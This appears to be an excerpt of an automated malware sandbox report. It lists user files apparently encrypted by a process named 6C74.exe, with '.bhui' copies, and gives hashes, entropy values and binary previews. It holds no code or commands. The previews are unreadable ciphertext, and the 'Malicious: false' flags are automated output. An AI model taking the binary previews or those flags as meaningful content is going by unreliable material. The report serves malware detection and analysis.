JQ6Eh/U..F.@q..`G.H5....9.......$.d]S).%..@........2..-...I...?...My...Xe.=....WUN.-.4o.<.......;...<.p........#.7.)]q....J.{...4..w......#...SEB...<.h.A,.{............g...x...^....b.....!KI..j.......~......iR......r.g..V>.(......>$ ......J"..I.r.9....A.....:......(..g..?.%.D`~.......Rl..

C:\Users\user\Documents\LHEPQPGEWF.mp3.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.852497540124028
Encrypted:	false
SSDEEP:	24:9+V676C2T76i2/8q9ItpmOnuq6WIKaIhQkDmh7ERJv/G1i4yTBA6zQvQ2VceC6bE:9+V06F7zSpIXnuqH3hvyCv/b42kyQPmD
MD5:	1A8A57289A83B9617685820AA5FFB1CB
SHA1:	24BD3881ADA3B4D1A4B2302AB5F27D6F12804040
SHA-256:	3AA8DE05F67F8389BA7516523E47EB8FF6C858FDCCAFB4FEDB6254AC79F38E77
SHA-512:	97069ED606F09B0F8E56D517CE67EBB89EF8EFDE9FC1583541933B8C0349415B457DD6256ADD68A0843E29103F08D8B4B17F91F5C83C22330A086850E0651492
Malicious:	false
Reputation:	unknown
Preview:	LHEPQ.4..z.;.r$.i.Fg3....-..!-...j].+x/.s..<o.V.B.h...<9[.a9..a..!`B......z......+h_9m.....R... NL?..L.v..l.j..e..f.#.\...60...._...........O).v%';(....R........O...;.41.Ma....@g[.Y..nwsi.........-......8~T...6.2.....j..6."T@.....^...aO...%...:i.85...[v..w.3....n.C?......./......Nk&..B.Y.V.......m{%...sJ}y.G.ja....D..0QtD.....Ju....b.....,...X.3s."}..]L..../.Hb.....Q.@%.x..AB...$o.1..W0..."ll....n<..,..CFN.....P....U...H/Gf#...I[........P&...L...QJh~e.9W..2.....f.VA...1...T...X..X"..=3..+.g.$....m...rF....e.7....W.o..}.....q..P[.g.P......z-.....J...b.Z../G....FQ..S.P@t..t....2..A.2.S^T...A_....+..<.MO..m...x...K;.W....re..+....b.?.,#T...DM..=.....6. JQ6Eh/U..F.@q..`G.H5....9.......$.d]S).%..@........2..-...I...?...My...Xe.=....WUN.-.4o.<.......;...<.p........#.7.)]q....J.{...4..w......#...SEB...<.h.A,.{............g...x...^....b.....!KI..j.......~......iR......r.g..V>.(......>$ ......J"..I.r.9....A.....:......(..g..?.%.D`~.......Rl..

C:\Users\user\Documents\LIJDSFKJZG.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.857583209299455
Encrypted:	false
SSDEEP:	24:0POXsU9MF7pLCV55EOr0tS0tPU54kt2IYNKeFAzl4JkL8hgeWbD:uUsZ9pCX5LKW2NKeU4uo2D
MD5:	87B94718A491BB960FA8C05FBF820D0C
SHA1:	964264DB46605FF7C8F6E7336EF728F20F45CE14
SHA-256:	EF991617EFC6D9FFB66F5B4E982F4B0FC42E6C6A05DE3ED1F71A902A74E6D827
SHA-512:	BB9C1FBF8C97BFAC98E433DDFD65014930F3C236129CC5BB4E67AD639E8462855DB7EB96D0F583EE085AFC2729E71B062A4DB979E5293A4150921A3A6295BAC4
Malicious:	false
Reputation:	unknown
Preview:	LIJDSkK.p.S.].../E=b...K.TA........r......4<.aK8jh~_.d.r"N<pBQ.m.....Pe.j.w..K..].....D.......@wH.\...E.)...%.}..N+..mI.-%2nN......2....8W..}`.....#..z.4\|......f..J@cd..CD..`.o%...2...k..m'.....A.m...j:..)}..c..e...$..Qq.vDL.8..{...#.y".../t.A_r.....%.n.....!K.vOj..'n..D......J.#..2.[..~@..}...\|..w.<;.....A..6..p.z6U("9E....!.. .....<...%.TD..f....1..+lj.......&...#...`.mIM^.'[5.zp(.GV.y.6...@.......i...+..n.}dE.........j..1..=:...R(a%I.a5..2N.@.:..2.\3.S.M+..4fQ./D......p...Lb.c+......Y.0.Ox...;...z..P.b+.E7w.\|.?...mZ...y..y.n.k.N.8....t.....^X.._....k..01.oGt-.L.......H..o.\|..q.H.X..v.zN(.Mv....RV..?.s.m.....Q...l...k#y.#q....\...x...f1...pA.}..1Z.........}....[53@T.9.Z.\|{0p....%.......+....~uEy.Q..e.......a._..~D.Xl..e.L...bb[...h......K.C).r...N].l...gIt?....N5U.A.ub<6&......J....aH.yx.B.(...9..L..................Q.*...]Q.3..;+.g.....u1>..k.g...Ir~O.=.}>.f.=.;..+]I..3.5..y....'.2~.u.r..pt.H..g.\|...].9.o4...Q@.l.VRK.....0.... ..S.1....m/

C:\Users\user\Documents\LIJDSFKJZG.pdf.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.857583209299455
Encrypted:	false
SSDEEP:	24:0POXsU9MF7pLCV55EOr0tS0tPU54kt2IYNKeFAzl4JkL8hgeWbD:uUsZ9pCX5LKW2NKeU4uo2D
MD5:	87B94718A491BB960FA8C05FBF820D0C
SHA1:	964264DB46605FF7C8F6E7336EF728F20F45CE14
SHA-256:	EF991617EFC6D9FFB66F5B4E982F4B0FC42E6C6A05DE3ED1F71A902A74E6D827
SHA-512:	BB9C1FBF8C97BFAC98E433DDFD65014930F3C236129CC5BB4E67AD639E8462855DB7EB96D0F583EE085AFC2729E71B062A4DB979E5293A4150921A3A6295BAC4
Malicious:	false
Reputation:	unknown
Preview:	LIJDSkK.p.S.].../E=b...K.TA........r......4<.aK8jh~_.d.r"N<pBQ.m.....Pe.j.w..K..].....D.......@wH.\...E.)...%.}..N+..mI.-%2nN......2....8W..}`.....#..z.4\|......f..J@cd..CD..`.o%...2...k..m'.....A.m...j:..)}..c..e...$..Qq.vDL.8..{...#.y".../t.A_r.....%.n.....!K.vOj..'n..D......J.#..2.[..~@..}...\|..w.<;.....A..6..p.z6U("9E....!.. .....<...%.TD..f....1..+lj.......&...#...`.mIM^.'[5.zp(.GV.y.6...@.......i...+..n.}dE.........j..1..=:...R(a%I.a5..2N.@.:..2.\3.S.M+..4fQ./D......p...Lb.c+......Y.0.Ox...;...z..P.b+.E7w.\|.?...mZ...y..y.n.k.N.8....t.....^X.._....k..01.oGt-.L.......H..o.\|..q.H.X..v.zN(.Mv....RV..?.s.m.....Q...l...k#y.#q....\...x...f1...pA.}..1Z.........}....[53@T.9.Z.\|{0p....%.......+....~uEy.Q..e.......a._..~D.Xl..e.L...bb[...h......K.C).r...N].l...gIt?....N5U.A.ub<6&......J....aH.yx.B.(...9..L..................Q.*...]Q.3..;+.g.....u1>..k.g...Ir~O.=.}>.f.=.;..+]I..3.5..y....'.2~.u.r..pt.H..g.\|...].9.o4...Q@.l.VRK.....0.... ..S.1....m/

C:\Users\user\Documents\NIRMEKAMZH.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.833993060928499
Encrypted:	false
SSDEEP:	24:P5hu2SAEkDXR/kxS5uyM1956atEUsSSxjHfJTeAY4qRrViIsz1wRe8+WbD:P5hJEkzRcxZ995rttsSSJfwAY4qRrVi2
MD5:	D9D762EC65A40086087B5102F4A14B25
SHA1:	743D60D2394A8A11DE960C9C1BEDB76CA02DB4A8
SHA-256:	A369014D439C606F4E19C1F9F31CA9FDFA88FD1CF44F3CB341D6064398A45007
SHA-512:	3A499A49E093E4098766B77C753DBF9AB5D65577043A7B89D1028607EA508072A2E057D6F08E94D46C6252002BE29094F40A2EC3CAFC6A87F80BCA5811C0F8B0
Malicious:	false
Reputation:	unknown
Preview:	NIRME...+...b....Jum.6....k.(98....4..F..".e-...u%....?.o.....x.....a.\|...}x..-3...#..mj/.QL(.0"F.;.....\......Z...N5'.5sR..7..@9.......".p......(m.\|c..~#.!##...L....ZP5'...{:h..Z............v..W......B.....v.;....2...wl.n.tD/.....["...2.&"..s......r.....;&/t....tX...Rz.....34.....R.e..";.@.\u..Ca..^.......2..o.Q.&4..y..w....R\|?..l.D..Lb..Yx....5..V+..4.gpyJ..}G..j...e.._..UC.kM..L...2.]-.,...v>{.u^.A..8.5.>.q....a`.3.]..z...&.t..D4.F.N..oa%..T.h...k..Uk3].Q?..2.w......B.<...W1....,q.. .......JD.....L(b.5C;.4..c. ...P....U.:S..r`&.}^.....n...R.".Z.TsG!..+..si<....C(..yU....&[....l\|..,h.Y..........].{....J...~.:.V.`K.......\|.\|A.Wt.........eN..-.iFo.t..I)....wO.%.FI...(..?.....t.%.......g.n...N.".......`...:....Nxc...sw...{...b.G...j.d..f.;.#..e..C......&.....{...z\|.H...N.E.Y...G9....F....>...].:.c.r.^...D......HI``..z..z.L...5"....I..Y....?..kP.$..-^...d{...m..B.@.;Q6}cE[.F.r.D.)n..s.zR..)%.;..;=..`?Mz........G...[D..k....

C:\Users\user\Documents\NIRMEKAMZH.png.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.833993060928499
Encrypted:	false
SSDEEP:	24:P5hu2SAEkDXR/kxS5uyM1956atEUsSSxjHfJTeAY4qRrViIsz1wRe8+WbD:P5hJEkzRcxZ995rttsSSJfwAY4qRrVi2
MD5:	D9D762EC65A40086087B5102F4A14B25
SHA1:	743D60D2394A8A11DE960C9C1BEDB76CA02DB4A8
SHA-256:	A369014D439C606F4E19C1F9F31CA9FDFA88FD1CF44F3CB341D6064398A45007
SHA-512:	3A499A49E093E4098766B77C753DBF9AB5D65577043A7B89D1028607EA508072A2E057D6F08E94D46C6252002BE29094F40A2EC3CAFC6A87F80BCA5811C0F8B0
Malicious:	false
Reputation:	unknown
Preview:	NIRME...+...b....Jum.6....k.(98....4..F..".e-...u%....?.o.....x.....a.\|...}x..-3...#..mj/.QL(.0"F.;.....\......Z...N5'.5sR..7..@9.......".p......(m.\|c..~#.!##...L....ZP5'...{:h..Z............v..W......B.....v.;....2...wl.n.tD/.....["...2.&"..s......r.....;&/t....tX...Rz.....34.....R.e..";.@.\u..Ca..^.......2..o.Q.&4..y..w....R\|?..l.D..Lb..Yx....5..V+..4.gpyJ..}G..j...e.._..UC.kM..L...2.]-.,...v>{.u^.A..8.5.>.q....a`.3.]..z...&.t..D4.F.N..oa%..T.h...k..Uk3].Q?..2.w......B.<...W1....,q.. .......JD.....L(b.5C;.4..c. ...P....U.:S..r`&.}^.....n...R.".Z.TsG!..+..si<....C(..yU....&[....l\|..,h.Y..........].{....J...~.:.V.`K.......\|.\|A.Wt.........eN..-.iFo.t..I)....wO.%.FI...(..?.....t.%.......g.n...N.".......`...:....Nxc...sw...{...b.G...j.d..f.;.#..e..C......&.....{...z\|.H...N.E.Y...G9....F....>...].:.c.r.^...D......HI``..z..z.L...5"....I..Y....?..kP.$..-^...d{...m..B.@.;Q6}cE[.F.r.D.)n..s.zR..)%.;..;=..`?Mz........G...[D..k....

C:\Users\user\Documents\NWCXBPIUYI.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.858588661716329
Encrypted:	false
SSDEEP:	24:WCWw9RtDEqPKJIbniDvLDXdzJNwtTXj0suGl9gNj/bP++SPWbD:jWwrPkIbn8vFk9t9gF/bm+ScD
MD5:	6C442E2B130CD2120BA5D908398B3FCA
SHA1:	A089AD9584D4C6BE3091C6BF314861340227750E
SHA-256:	EAC70BF37EBEEA9F20A4F3F41045ADF22009F20FFE6C7F70BE67E2BB71FD13A3
SHA-512:	BF069A7BE0B5D3F439FEE25720CD24ACCDBBFEB4DE2ADCCD5B6114CE89F152EBD4517CF32EE87528559285BD4419A7BB1BCEB4D25163935FF4EF5854C9CA008F
Malicious:	false
Reputation:	unknown
Preview:	NWCXBu....W..FMi$........@..g....K.\..../H.....q..^....J{.WN..n.^.<U..I....N..R ....!s.D&.h.....5`...a.eO..[9.Fv.4#a..sjE..?..Dd..........\.).h....6o.>L....&.s..x..:.]k..-.=.W..w....a..gy...(%........^7O..`%..pw.u[...,......fQ."....[....5.<.....9.b....tI!......e\.V..L.r.s..$.......r...+..O.@..].........y........o.... .f...I.,... 2......)........1.............9.CYs0..._..-9..K......E...{..M...........o.....t]..y.....]h.....b...J..0HWc..?...g...C..]L.-.C3.L8sf.K.u..y...Q.U."5D...Z......#.....^...b5...Y g[O..O..O..o..=..O.6.4.....aB.../.4.<.s..i.\Ll.>..r.v.j.P...C..G.R.U.d.>.....:b...... .a{..A...#7..c......qC.F...vR9.3... ....g..>z..B.V....R..SK.U\|>.f.zgs.W_*.P.p....a.W...+,[..:#N..p....<f3....r...o0...!..\|..Xv..cD...<7..\|.._K..T.W.D.K.......1G.\|\|i.X..k`{...Y s....p..E9V......?..klv....o.!.\..yq....o.\.N.d.....;....p.6..m.w....%e..0X..........U.;d.<s......o....q.Sm...9=.....m#....N...A....hGKEw{#..>n.j6....m.:.....Y.@.i......xC[.}+

C:\Users\user\Documents\NWCXBPIUYI.docx.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.858588661716329
Encrypted:	false
SSDEEP:	24:WCWw9RtDEqPKJIbniDvLDXdzJNwtTXj0suGl9gNj/bP++SPWbD:jWwrPkIbn8vFk9t9gF/bm+ScD
MD5:	6C442E2B130CD2120BA5D908398B3FCA
SHA1:	A089AD9584D4C6BE3091C6BF314861340227750E
SHA-256:	EAC70BF37EBEEA9F20A4F3F41045ADF22009F20FFE6C7F70BE67E2BB71FD13A3
SHA-512:	BF069A7BE0B5D3F439FEE25720CD24ACCDBBFEB4DE2ADCCD5B6114CE89F152EBD4517CF32EE87528559285BD4419A7BB1BCEB4D25163935FF4EF5854C9CA008F
Malicious:	false
Reputation:	unknown
Preview:	NWCXBu....W..FMi$........@..g....K.\..../H.....q..^....J{.WN..n.^.<U..I....N..R ....!s.D&.h.....5`...a.eO..[9.Fv.4#a..sjE..?..Dd..........\.).h....6o.>L....&.s..x..:.]k..-.=.W..w....a..gy...(%........^7O..`%..pw.u[...,......fQ."....[....5.<.....9.b....tI!......e\.V..L.r.s..$.......r...+..O.@..].........y........o.... .f...I.,... 2......)........1.............9.CYs0..._..-9..K......E...{..M...........o.....t]..y.....]h.....b...J..0HWc..?...g...C..]L.-.C3.L8sf.K.u..y...Q.U."5D...Z......#.....^...b5...Y g[O..O..O..o..=..O.6.4.....aB.../.4.<.s..i.\Ll.>..r.v.j.P...C..G.R.U.d.>.....:b...... .a{..A...#7..c......qC.F...vR9.3... ....g..>z..B.V....R..SK.U\|>.f.zgs.W_*.P.p....a.W...+,[..:#N..p....<f3....r...o0...!..\|..Xv..cD...<7..\|.._K..T.W.D.K.......1G.\|\|i.X..k`{...Y s....p..E9V......?..klv....o.!.\..yq....o.\.N.d.....;....p.6..m.w....%e..0X..........U.;d.<s......o....q.Sm...9=.....m#....N...A....hGKEw{#..>n.j6....m.:.....Y.@.i......xC[.}+

C:\Users\user\Documents\NWCXBPIUYI.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.855628414118135
Encrypted:	false
SSDEEP:	24:h5XBhLB/TZQ164XmqcoVCB118vEKwA7Ach+GH1lRxTkjo1Gl815edWbD:zx5Nu16Ac9oX7AdYhxyH4PD
MD5:	522C70D1A457996A035D993F2D22B7C3
SHA1:	2EB0C04737D56248EF2D8C6BB4A7C98EF74626CA
SHA-256:	6E97BFBAED5B3EAC2C98C55AAEB120A338A0B9F0B7CCEDEA10FA41FC78FCBAAC
SHA-512:	0ACFDDC1AC3BA95A9E436D2AE505C534AD07BDD0A3E2150B12C5B854F58C90F1E4C057FB34FD301F88FE66E48DDF56705BCA7468439031E4BB6D9246ED3D9129
Malicious:	false
Reputation:	unknown
Preview:	NWCXBN..9j..e\..gg...F....... \|t..\.......4.x...z/...?.P.......Wj....l... ..gjF.../.-....:.9....K.{...<e..C...7.Q..8...p......j4....ibI.79.".qU.r..".8.+...z.8.n.W.}..'4.J...>.I. ..G.E......c.7..\|I....\|.w...v@!."E..d._...R.0..o.$.b..r.c.......l.!_.....>Y.;.I.\?+..\|.....r.$Z....>.D./Y[....Q3.>.....P.....)....&J.A...h..L.9..p..'..g..t..=.!.\_.`cE.n..P.......f...8vw..Ngi..q'....#.Yhp..=.#..`....rH]....e.=F.v.D;T....j8".'\|l..p!K..l...G?$O..j...7..g..n...$..A['...z.M.....i..~.'.cr..8......x.......HI...!..W..,..$.(b..d}:..X.u\._n.E.B6.af.h...~..&u..SO.<E=M..8....1....m.r4...,....[.:e.J...L.W.0q2&.....%\......rN.u&v.\....9....L..8..}....s......2X..[.b...7..tO!u.H.+?.i....S.IEM...W. f..w.F..![..X..N....n..i$.e........\|==..qO%.U.+.sp"....%..........WL.4MOQ..t...X.FP..j.}..iFB....UX.1o5.3.c.]..d.......l...$zq.j.[.=......u..p...V......`.^....h,.!..m.o...<.3F...Q\...4...d....=....SW/J.Q!.+.......r.U...Qt......;..8..}..z.c[i...3...h......)u6M~,..G......gd..

C:\Users\user\Documents\NWCXBPIUYI.jpg.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.855628414118135
Encrypted:	false
SSDEEP:	24:h5XBhLB/TZQ164XmqcoVCB118vEKwA7Ach+GH1lRxTkjo1Gl815edWbD:zx5Nu16Ac9oX7AdYhxyH4PD
MD5:	522C70D1A457996A035D993F2D22B7C3
SHA1:	2EB0C04737D56248EF2D8C6BB4A7C98EF74626CA
SHA-256:	6E97BFBAED5B3EAC2C98C55AAEB120A338A0B9F0B7CCEDEA10FA41FC78FCBAAC
SHA-512:	0ACFDDC1AC3BA95A9E436D2AE505C534AD07BDD0A3E2150B12C5B854F58C90F1E4C057FB34FD301F88FE66E48DDF56705BCA7468439031E4BB6D9246ED3D9129
Malicious:	false
Reputation:	unknown
Preview:	NWCXBN..9j..e\..gg...F....... \|t..\.......4.x...z/...?.P.......Wj....l... ..gjF.../.-....:.9....K.{...<e..C...7.Q..8...p......j4....ibI.79.".qU.r..".8.+...z.8.n.W.}..'4.J...>.I. ..G.E......c.7..\|I....\|.w...v@!."E..d._...R.0..o.$.b..r.c.......l.!_.....>Y.;.I.\?+..\|.....r.$Z....>.D./Y[....Q3.>.....P.....)....&J.A...h..L.9..p..'..g..t..=.!.\_.`cE.n..P.......f...8vw..Ngi..q'....#.Yhp..=.#..`....rH]....e.=F.v.D;T....j8".'\|l..p!K..l...G?$O..j...7..g..n...$..A['...z.M.....i..~.'.cr..8......x.......HI...!..W..,..$.(b..d}:..X.u\._n.E.B6.af.h...~..&u..SO.<E=M..8....1....m.r4...,....[.:e.J...L.W.0q2&.....%\......rN.u&v.\....9....L..8..}....s......2X..[.b...7..tO!u.H.+?.i....S.IEM...W. f..w.F..![..X..N....n..i$.e........\|==..qO%.U.+.sp"....%..........WL.4MOQ..t...X.FP..j.}..iFB....UX.1o5.3.c.]..d.......l...$zq.j.[.=......u..p...V......`.^....h,.!..m.o...<.3F...Q\...4...d....=....SW/J.Q!.+.......r.U...Qt......;..8..}..z.c[i...3...h......)u6M~,..G......gd..

C:\Users\user\Documents\NWCXBPIUYI.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.836404070130864
Encrypted:	false
SSDEEP:	24:kwWbkidBoD47YgW+/Kpv2u6bnPQGybsMpeaZhijmCKLorGDe9iwCWbD:ubjfoD47TW+/bsYMpebjzK8rGDe9ZD
MD5:	E275841A25C0532200AD6EFF7A41481D
SHA1:	0B0D2EC7CEF647A85EF5E50A810EC59637A09386
SHA-256:	7E18D588FF94ED023F4FEB5495F7288EBC3066E4E23B7596AE722463130F4F79
SHA-512:	929848AA27F1A220C189AA8FBDC42C358B5DDB7567BDAC58B9388E5E1E7CAA6DCEF7DF2F93B6B49202F9C665601CB9A15CD92FEAE83A3C707872842304284B65
Malicious:	false
Reputation:	unknown
Preview:	NWCXB....F..\|.4 Gx.E-._.lo.qM...X......7.}.u8..^...........n...E...@-..IQa:..>...#...>.i.<.....0I..x..R...l..^.i.^...B$.......D.....C ..}.........D...N...Ir;G.4"...0.Qf..g.;.........E.~>'.PM.t...v..M..u...In..L.Q....6...5....?...RTLM.....#..5.&..?.=..i[...oJ..............;.O...e+HJ.D...5.......!w\|. ...D+.%..x6]<n.6..1.\?.~._....6.?\|...%.s......(e.P.....4.....$.@.q..0#gq..y./..m...".b.K({.22>.ox?F.q.DP.:%._.NC..78ylO....9.:..{..j&..` G.u.v......Aq.I...G.b.46....^F......m.1v.9....J.~.W.E.........N.s6.^.`.L..;.O.....G....&..6.....<d....&.....r....]...>.W.5... ..tM..&.7...}.......m.G...!=.......G........u...Y..J...:.......I..wM.8U...V......BE.t..aT...H.....gw.\T...g...(..0...~._M..Rr7F.Q..O.51...V..R2..@;......V..Y#...Z.H$.4og8.8f..k.V.....z.......5\c.~f......!....5%.....M..g... [..$.G...Hl...(NX.....[[.=.L.F56K......%k........3.C.....+.]Q.A6....n.S7<P-.O._..W.R..'.....T.CF..,.u........4?6n..o....w]#b..4.m...<l.J...Ba.nv0..A..u.`{........t.\|..k}

C:\Users\user\Documents\NWCXBPIUYI.xlsx.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.836404070130864
Encrypted:	false
SSDEEP:	24:kwWbkidBoD47YgW+/Kpv2u6bnPQGybsMpeaZhijmCKLorGDe9iwCWbD:ubjfoD47TW+/bsYMpebjzK8rGDe9ZD
MD5:	E275841A25C0532200AD6EFF7A41481D
SHA1:	0B0D2EC7CEF647A85EF5E50A810EC59637A09386
SHA-256:	7E18D588FF94ED023F4FEB5495F7288EBC3066E4E23B7596AE722463130F4F79
SHA-512:	929848AA27F1A220C189AA8FBDC42C358B5DDB7567BDAC58B9388E5E1E7CAA6DCEF7DF2F93B6B49202F9C665601CB9A15CD92FEAE83A3C707872842304284B65
Malicious:	false
Reputation:	unknown
Preview:	NWCXB....F..\|.4 Gx.E-._.lo.qM...X......7.}.u8..^...........n...E...@-..IQa:..>...#...>.i.<.....0I..x..R...l..^.i.^...B$.......D.....C ..}.........D...N...Ir;G.4"...0.Qf..g.;.........E.~>'.PM.t...v..M..u...In..L.Q....6...5....?...RTLM.....#..5.&..?.=..i[...oJ..............;.O...e+HJ.D...5.......!w\|. ...D+.%..x6]<n.6..1.\?.~._....6.?\|...%.s......(e.P.....4.....$.@.q..0#gq..y./..m...".b.K({.22>.ox?F.q.DP.:%._.NC..78ylO....9.:..{..j&..` G.u.v......Aq.I...G.b.46....^F......m.1v.9....J.~.W.E.........N.s6.^.`.L..;.O.....G....&..6.....<d....&.....r....]...>.W.5... ..tM..&.7...}.......m.G...!=.......G........u...Y..J...:.......I..wM.8U...V......BE.t..aT...H.....gw.\T...g...(..0...~._M..Rr7F.Q..O.51...V..R2..@;......V..Y#...Z.H$.4og8.8f..k.V.....z.......5\c.~f......!....5%.....M..g... [..$.G...Hl...(NX.....[[.=.L.F56K......%k........3.C.....+.]Q.A6....n.S7<P-.O._..W.R..'.....T.CF..,.u........4?6n..o....w]#b..4.m...<l.J...Ba.nv0..A..u.`{........t.\|..k}

C:\Users\user\Documents\NWCXBPIUYI\GNLQNHOLWB.mp3

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.874920213080932
Encrypted:	false
SSDEEP:	24:ZJXvl31vUH8N0JpNfteptmijmgoN2KKetQ6UgKf0TXqGGphCkVVDZiwXWbD:ZRXK8NkpNftEtmmcNBKOQzgKcXGCoiwg
MD5:	CC8CD77D7AEC57CD888D3E37408D32B8
SHA1:	A391FF0FFF6C9B1C3438567EF3F5EFDB27E9C0CD
SHA-256:	F5DEBCF992F7123D6C3320042B17CCDDEB0D97AB0306376263F0F762C04B53E2
SHA-512:	B2072FFF3D769A9245B544BE02F74D1CA871032683FCCFA5744D5C029DC4E07D6BAC5D46E387558DF9F43F0504C18248FF0D0ED074047B5EC5E33D8A5A85BA65
Malicious:	false
Reputation:	unknown
Preview:	GNLQN...........N.J.Z..:y..Us<..-..0...eS.S9.6..k..A..V.z.(~.............^0.bq#...4.].l.D.A.[.O..o\I2Pwu.sI.9.d.4...`.....g..?9.^.EXc....h..#Q..........W...g....C]}(...h...........V...u...?.u..K....H. t`a.l.....`..2Q.......@i......4.].,.Gn..[nU.F,..G...`"..l..z...f&.....Z...{...Wh>.p..............).=(\|.D%....s..Z....7...OZ.q)g..\...L.. ...6..\."^....hy...j.K6...............H.....To.6..t._..8....x..N.......Y..:.4.p.J.\..$[tTF..x4VSc.1T3....?.iLck=p..6u...`.%./.NR.\|.J..M..5../.s...j..@._m...M.&..R,...UC.F..{..3..?.M...5V............&R....A.27rp.../...=V...j.:.._...n..Q........O...u.w...h..i.p..t)7.y..e.Mn..y@........q.i..N...$X...1.4....7.ULO..\|5,.2....H.}......+...X"D.t(.p._.U....j;..v.P1...T...A%:._..I....U..@./+..N..%......$.U........a...E..E.K./..P....h6I.m/...n(...SsS#.7. [K.@Wv.A0.Q~......]g..3.........I....2W.<Q..B..C?`.+...`....-.....cb.....Cy."G...L&.o.p`.w..e*..y.x.!..F.`.U..........\...".QV..".......M.. .hb[...w....._...D$

C:\Users\user\Documents\NWCXBPIUYI\GNLQNHOLWB.mp3.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.874920213080932
Encrypted:	false
SSDEEP:	24:ZJXvl31vUH8N0JpNfteptmijmgoN2KKetQ6UgKf0TXqGGphCkVVDZiwXWbD:ZRXK8NkpNftEtmmcNBKOQzgKcXGCoiwg
MD5:	CC8CD77D7AEC57CD888D3E37408D32B8
SHA1:	A391FF0FFF6C9B1C3438567EF3F5EFDB27E9C0CD
SHA-256:	F5DEBCF992F7123D6C3320042B17CCDDEB0D97AB0306376263F0F762C04B53E2
SHA-512:	B2072FFF3D769A9245B544BE02F74D1CA871032683FCCFA5744D5C029DC4E07D6BAC5D46E387558DF9F43F0504C18248FF0D0ED074047B5EC5E33D8A5A85BA65
Malicious:	false
Reputation:	unknown
Preview:	GNLQN...........N.J.Z..:y..Us<..-..0...eS.S9.6..k..A..V.z.(~.............^0.bq#...4.].l.D.A.[.O..o\I2Pwu.sI.9.d.4...`.....g..?9.^.EXc....h..#Q..........W...g....C]}(...h...........V...u...?.u..K....H. t`a.l.....`..2Q.......@i......4.].,.Gn..[nU.F,..G...`"..l..z...f&.....Z...{...Wh>.p..............).=(\|.D%....s..Z....7...OZ.q)g..\...L.. ...6..\."^....hy...j.K6...............H.....To.6..t._..8....x..N.......Y..:.4.p.J.\..$[tTF..x4VSc.1T3....?.iLck=p..6u...`.%./.NR.\|.J..M..5../.s...j..@._m...M.&..R,...UC.F..{..3..?.M...5V............&R....A.27rp.../...=V...j.:.._...n..Q........O...u.w...h..i.p..t)7.y..e.Mn..y@........q.i..N...$X...1.4....7.ULO..\|5,.2....H.}......+...X"D.t(.p._.U....j;..v.P1...T...A%:._..I....U..@./+..N..%......$.U........a...E..E.K./..P....h6I.m/...n(...SsS#.7. [K.@Wv.A0.Q~......]g..3.........I....2W.<Q..B..C?`.+...`....-.....cb.....Cy."G...L&.o.p`.w..e*..y.x.!..F.`.U..........\...".QV..".......M.. .hb[...w....._...D$

C:\Users\user\Documents\NWCXBPIUYI\HQJBRDYKDE.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.859357196635572
Encrypted:	false
SSDEEP:	24:Se6Sh01ZK90jKDIi7ZdDBbD7ymgaStMyeGlc7XEqAbVfCift2n0CSOsWs1vWbD:JuZO0jKBBbDyT3lEtAbVpft2rJZD
MD5:	15A82F7AC3DB62051691F1F8D61228C6
SHA1:	95EE47BE55A52CF8156E7B1CFACE28DF7BB21C14
SHA-256:	5C33D7AF4E61F3E0CEA9C792387005741D2D0EAB01C6C71DBFFD1A8A2C15C183
SHA-512:	5CC4630B1EF42B94BD15F09F8C5CE93DDF60FDDFD285BA1955F381141AF366298782327C95A7A1C7B86523972BBA59444BA4351C0C82D4520901C4A0E90AF655
Malicious:	false
Reputation:	unknown
Preview:	HQJBR.@.9\|....!`..0{..V.>..:..c.v'..v]Z.k..z..ofX..YL;........C.V.J..hp]h......._..~K.t..A+D.~kw.....o...^...93.>&.Ym".i.....T.N...,.n..d.3....]?.....3.7.A.?.R...i.~...\|....Z..._...i..!..fz.9.c.j.8....z`....e.p.~....$.]u.,:.....7."J........?..dD...r.5.......{.......O.lE]...7JH.m....Y^..;.A..M........Y@..<.:P_.=...9....`.>u}...\.Q.'...'>...J+..3..+Q....6..:=5.....mu.?+.i..d..w. ....<=/."Tc,.....?v...)....{....0.77...&O..BJ.3.P.Z..pWBkZ.7,.......G....}R....u0.J=..%[v7#Ll........9..j..v.2..8:T.....T.F.n.....z"..d90s......g..'..C>......y..h.J.T'..D....h...........B..O..Dj,..,U.n.G+.V..9..\|;..1.I.ds..r....i[-+...W...T.;......o.U..S.&H..?.I..pr..kJ=.'S_.j.7.`d.e.Y...&.T`.8........^yc..H.....B..=..WQ..%.R..7A..._ 